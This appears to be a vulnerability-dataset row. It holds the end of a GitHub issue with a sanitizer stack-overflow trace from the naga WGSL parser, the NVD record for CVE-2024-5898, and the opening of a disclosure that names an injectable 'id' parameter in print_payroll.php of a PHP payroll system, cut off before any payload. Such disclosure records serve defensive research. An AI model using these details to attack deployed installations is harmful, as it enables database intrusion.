#49 0x555b4f7a0e04 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::ha1ecfa7432ce2a18 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:852:62
#50 0x555b4f7a0e04 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h11097d75ca1d4c90 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#51 0x555b4f7abd37 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h0b29f2891687a004 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:838:41
#52 0x555b4f7abd37 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#53 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33
#54 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#55 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25
#56 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#57 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17
#58 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#59 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9
#60 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49
#61 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#62 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41
#63 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#64 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33
#65 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#66 0x555b4f7a65f9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ab282502cd47b27 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:896:25
#67 0x555b4f7a65f9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h6e55776d754ff865 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#68 0x555b4f7a91b9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::h6c989bb92b53e79c /src/wgpu/naga/src/front/wgsl/parse/mod.rs:888:17
#69 0x555b4f7a91b9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hd580949c24cf7bb8 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#70 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression_with_span::hcc90cbee76e0cc50 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:880:22
#71 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9
#72 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28
#73 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28
#74 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18
#75 0x555b4f7a0e04 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::ha1ecfa7432ce2a18 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:852:62
#76 0x555b4f7a0e04 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h11097d75ca1d4c90 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#77 0x555b4f7abd37 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h0b29f2891687a004 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:838:41
#78 0x555b4f7abd37 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#79 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33
#80 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#81 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25
#82 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#83 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17
#84 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#85 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9
#86 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49
#87 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#88 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41
#89 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#90 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33
#91 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#92 0x555b4f7a65f9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ab282502cd47b27 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:896:25
#93 0x555b4f7a65f9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h6e55776d754ff865 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#94 0x555b4f7a91b9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::h6c989bb92b53e79c /src/wgpu/naga/src/front/wgsl/parse/mod.rs:888:17
#95 0x555b4f7a91b9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hd580949c24cf7bb8 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#96 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression_with_span::hcc90cbee76e0cc50 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:880:22
#97 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9
#98 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28
#99 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28
#100 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18
... ...
#411 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9
#412 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28
#413 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28
#414 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18
#415 0x555b4f7a0e04 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::ha1ecfa7432ce2a18 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:852:62
#416 0x555b4f7a0e04 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h11097d75ca1d4c90 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#417 0x555b4f7abd37 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h0b29f2891687a004 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:838:41
#418 0x555b4f7abd37 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#419 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33
#420 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#421 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25
#422 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#423 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17
#424 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#425 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9
#426 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49
#427 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#428 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41
#429 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#430 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33
#431 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#432 0x555b4f7a65f9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ab282502cd47b27 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:896:25
#433 0x555b4f7a65f9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h6e55776d754ff865 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#434 0x555b4f7a91b9 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::h6c989bb92b53e79c /src/wgpu/naga/src/front/wgsl/parse/mod.rs:888:17
#435 0x555b4f7a91b9 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hd580949c24cf7bb8 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#436 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression_with_span::hcc90cbee76e0cc50 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:880:22
#437 0x555b4f7cf542 in naga::front::wgsl::parse::Parser::general_expression::h24c377b05d599ba6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:869:9
#438 0x555b4f7c429b in naga::front::wgsl::parse::Parser::primary_expression::h746864ee7f9c87ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:618:28
#439 0x555b4f7cdba8 in naga::front::wgsl::parse::Parser::singular_expression::h5c3de80f367a39e0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:781:28
#440 0x555b4f7ca423 in naga::front::wgsl::parse::Parser::unary_expression::h684e82ebbf0571d6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:766:18
#441 0x555b4f7a0e04 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::ha1ecfa7432ce2a18 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:852:62
#442 0x555b4f7a0e04 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h11097d75ca1d4c90 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#443 0x555b4f7abd37 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h0b29f2891687a004 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:838:41
#444 0x555b4f7abd37 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#445 0x555b4f79f7f4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h66c0fcfdc30242ae /src/wgpu/naga/src/front/wgsl/parse/mod.rs:827:33
#446 0x555b4f79f7f4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h07c27e2bbcec7139 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#447 0x555b4f7a39d0 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1ad4b0db731fddaf /src/wgpu/naga/src/front/wgsl/parse/mod.rs:814:25
#448 0x555b4f7a39d0 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5c45e4063eb5f655 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#449 0x555b4f7a7bc4 in naga::front::wgsl::parse::Parser::equality_expression::_$u7b$$u7b$closure$u7d$$u7d$::h111b4739c2a0ae77 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:803:17
#450 0x555b4f7a7bc4 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hc5c8f4d9459bbd82 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#451 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::equality_expression::h33d0d8cf0e8fbcb6 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:794:9
#452 0x555b4f7a5049 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h1a4180951f20a413 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:923:49
#453 0x555b4f7a5049 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h5f17ceea535d3071 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#454 0x555b4f7aa769 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h009cb1660fd1d197 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:914:41
#455 0x555b4f7aa769 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdd8fd162d8ed00ff /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
#456 0x555b4f7a2409 in naga::front::wgsl::parse::Parser::general_expression_with_span::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::_$u7b$$u7b$closure$u7d$$u7d$::h55d826ced51e0164 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:904:33
#457 0x555b4f7a2409 in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::h35ddc307bce0ceb0 /src/wgpu/naga/src/front/wgsl/parse/mod.rs:69:31
SUMMARY: AddressSanitizer: stack-overflow /src/wgpu/naga/src/front/wgsl/parse/mod.rs in naga::front::wgsl::parse::ExpressionContext::parse_binary_op::hdfb95f1d26727453
==132416==ABORTING
```
Attached is the test sample.
[crash.zip](https://github.com/gfx-rs/naga/files/15470741/crash.zip)
| A stack overflow vulnerability was found | https://api.github.com/repos/gfx-rs/naga/issues/2591/comments | 1 | 2024-05-28T13:48:42Z | 2024-05-31T08:38:21Z | https://github.com/gfx-rs/naga/issues/2591 | 2,321,122,927 | 2,591 | 6,062 |
CVE-2024-5898 | 2024-06-12T17:15:52.577 | A vulnerability was found in itsourcecode Payroll Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file print_payroll.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268142 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/guiyxli/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268142"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268142"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.354926"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/guiyxli/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.268142"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.268142"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?submit.354926"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:angeljudesuarez:payroll_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "20FC2EF9-5A2B-4173-8F3B-34B209DA6A10",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/guiyxli/cve/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"guiyxli",
"cve"
] | # Itsourcecode Payroll Management System Project In PHP With Source Code v1.0 print_payroll.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Payroll Management System Project In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/payroll-system-php/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ netcat
## Vulnerable File
+ print_payroll.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/03/Payroll-Management-System-Project-In-PHP-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
